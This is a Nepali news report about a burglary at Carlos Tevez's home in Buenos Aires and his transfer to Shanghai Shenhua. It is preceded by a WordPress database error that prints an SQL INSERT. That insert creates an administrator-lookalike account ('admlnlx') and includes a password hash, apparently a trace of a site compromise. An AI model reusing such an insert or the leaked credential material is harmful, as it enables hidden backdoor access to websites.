WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6c4G1MITVj4J/LrU6DeR2masjN7ZJ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-16 07:03:42', '', 'admlnlx', 'admlnlx')
अर्जेन्टिना , पुस १३ –
अर्जेन्टिनी स्टार कार्लोस टेभेचको घरमा लुटपाट भएको छ। उरुग्वेमा आफ्नो बिहेको खुसीयाली मनाइरहेका टेभेच ब्युनोर्स आयर्सस्थित आफ्नो घरमा चोरी भएपछि निराश बनेको बेलायती पत्रिका द सनले जनाएको छ। गत बिहिबार मात्रै उनले उरुग्वेको रियो डि ला प्लाटामा बिहे गरेका थिए। भेनिसा मानसिल्ला टेभचको बाल्यकालदेखिकै प्रेमिका हुन्। बिहेअघि नै उनीहरुका ३ सन्तान जन्मिसकेका छन्। बिहिबार बिहे गरेपछि उरुग्वेमा पाहुनाहरुलाई पार्टी दिएका टेभेच अर्जेन्टिनाको राजधानी ब्युनोर्स आयर्सस्थित घरमा लुटपाट भएपछि निराश बनेका छन्। म्यानचेस्टर युनाइटेड तथा म्यानचेस्टर सिटीका पूर्व फरवार्ड टेभेचको घरबाट के-कति सम्पत्ति चोरी भयो भन्ने विषयमा केही सार्वजनिक भएको छैन्। आजै मात्रै ३२ वर्षका टेभेच चिनियाँ सुपर लिग क्लब साङघाई सेनहुवा जाने पक्का भएको थियो। उनले साङघाईमा प्रतिसिजन ४ करोड युरो तलब पाउनेछन्। यो उनले अर्जेन्टिनी क्लब बोका जुनियर्समा कमाउने आम्दानीभन्दा २० गुणाले बढी हो।